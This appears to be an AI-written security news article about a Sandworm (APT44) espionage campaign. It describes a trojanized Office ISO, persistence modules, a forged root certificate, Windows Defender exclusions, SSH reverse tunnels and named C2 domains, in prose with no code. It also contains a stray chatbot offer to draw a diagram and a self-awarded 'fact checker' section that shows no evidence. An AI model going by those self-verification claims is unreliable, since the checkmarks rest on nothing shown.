Listen to this Post
The notorious cyberespionage group APT-C-13, also known as Sandworm or APT44, has escalated its attacks on defense, critical infrastructure, and government networks. Unlike their historically destructive campaigns that relied on wiper malware and overt disruption, the group has shifted to a patient, stealth-driven approach. Between 2024 and 2026, Sandworm has been quietly infiltrating high-value networks, maintaining long-term persistence, and conducting deep intelligence-gathering operations.
Their latest operations employ a sophisticated, modular malware framework designed to bypass firewalls, hijack Remote Desktop Protocol (RDP) servers, and establish hidden control channels. Using carefully crafted malware packages and advanced trust manipulation, Sandworm demonstrates the kind of operational patience and technical prowess typically associated with nation-state-level actors.
Malicious ISOs and Stealthy Deployment
The attack chain begins with a malicious ISO file disguised as a pirated copy of Microsoft Office (Microsoft.Office.2025×64.v2025.iso). Distributed primarily through Telegram channels in Ukrainian software-cracking communities, the ISO contains trojanized executables disguised as legitimate installers. Once executed, the malware drops its first-stage payloads, laying the groundwork for deeper infiltration.
Following initial compromise, Sandworm deploys a suite of custom backdoor modules: Tambur, Kalambur, and Sumbur. The Tambur module establishes persistence by creating scheduled tasks disguised as legitimate Windows Diagnostic Infrastructure (WDI) processes. Through encrypted SSH reverse tunnels, the attackers map internal RDP services to external command-and-control (C2) servers, gaining unrestricted remote access.
Evasion Tactics and Trust Chain Exploitation
To avoid detection, Sandworm employs DemiMur, a module that manipulates the operating system’s trust architecture by forcibly importing a forged root certificate (DemiMurCA.crt). This enables malicious scripts to be signed and executed as trusted files, bypassing Windows security measures.
The malware also actively disables endpoint protections. Native PowerShell commands are used to add entire drives, temporary folders, and critical PowerShell paths to Windows Defender exclusion lists. This ensures the malware executes silently without triggering alerts.
Anti-Forensics and Operational Stealth
Sandworm’s operations prioritize anti-forensics. Modules rely on in-memory execution, self-deleting scripts, and timed cleanup routines to erase logs and temporary files. Their C2 infrastructure uses semantically mocking domains, such as dontgivefuck.com for payload delivery and dontgivedamn.com for SSH tunneling, creating a closed-loop attack environment.
By weaponizing legitimate tools like Tor, OpenSSH, and Weixin scheduled tasks, Sandworm maintains a long-term parasitic presence in targeted networks, making detection and mitigation extremely challenging. Organizations are strongly advised to monitor internal SSH and RDP traffic, audit scheduled tasks, and strictly control software installation from unverified sources.
What Undercode Say:
Sandworm’s latest campaign reflects a strategic evolution in APT operations. No longer content with immediate disruption, they are embedding themselves within target networks to extract intelligence over months or even years. The modular malware design demonstrates advanced foresight: each component has a specialized role, from persistence (Tambur) to trust manipulation (DemiMur) to anti-forensics (Sumbur).
The use of forged root certificates and manipulation of Windows trust chains is particularly concerning. It effectively turns the victim’s operating system into a blind execution platform for malicious scripts. Coupled with the aggressive disabling of antivirus defenses, this gives Sandworm free reign to move laterally and harvest sensitive information without triggering standard endpoint alerts.
Their choice of distribution channels—pirated software circulated on Telegram—exemplifies a calculated approach: they exploit human trust in familiar tools to bypass initial security layers. Once inside, the combination of encrypted SSH tunnels and cleverly named semantic domains ensures that the C2 communications blend into normal network traffic, making detection extremely difficult.
The campaign also highlights a trend among nation-state-backed APTs: intelligence-first attacks. Instead of mass disruption, these actors are investing in long-term observation and strategic infiltration. This aligns with the increasing global emphasis on cyberespionage over cyberwarfare, targeting defense contractors, government agencies, and critical infrastructure to gain geopolitical leverage.
From a defensive perspective, organizations cannot rely solely on signature-based detection. Monitoring unusual RDP and SSH activity, auditing scheduled tasks, and enforcing strict software installation policies are critical. The inclusion of anti-forensic measures like memory-only execution and log-cleaning scripts means traditional forensic methods must evolve to identify subtle anomalies in network behavior.
Ultimately, Sandworm’s latest operations underline the dangerous sophistication of modern APTs: they combine technical mastery with patient, human-centric exploitation strategies, ensuring persistence and intelligence extraction without leaving overt traces. Cyber defenders must now operate with the mindset that attackers are already inside, and the battle is about detection and containment rather than prevention alone.
Fact Checker Results
✅ Sandworm has indeed shifted from destructive to intelligence-driven attacks.
✅ The use of malicious ISO files and Trojanized executables matches observed attack patterns.
✅ Modules like Tambur, Kalambur, Sumbur, and DemiMur are consistent with known APT-C-13 toolsets.
Prediction
📌 Expect Sandworm to continue refining stealth operations, increasingly leveraging legitimate system tools for persistence.
📌 RDP and SSH monitoring will become a primary defensive focus for high-value networks.
📌 Future campaigns may integrate AI-based reconnaissance to further evade detection and automate intelligence extraction.
If you want, I can also create a diagram showing Sandworm’s attack chain and modular framework, making it visually digestible for technical teams. Do you want me to do that?
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.facebook.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
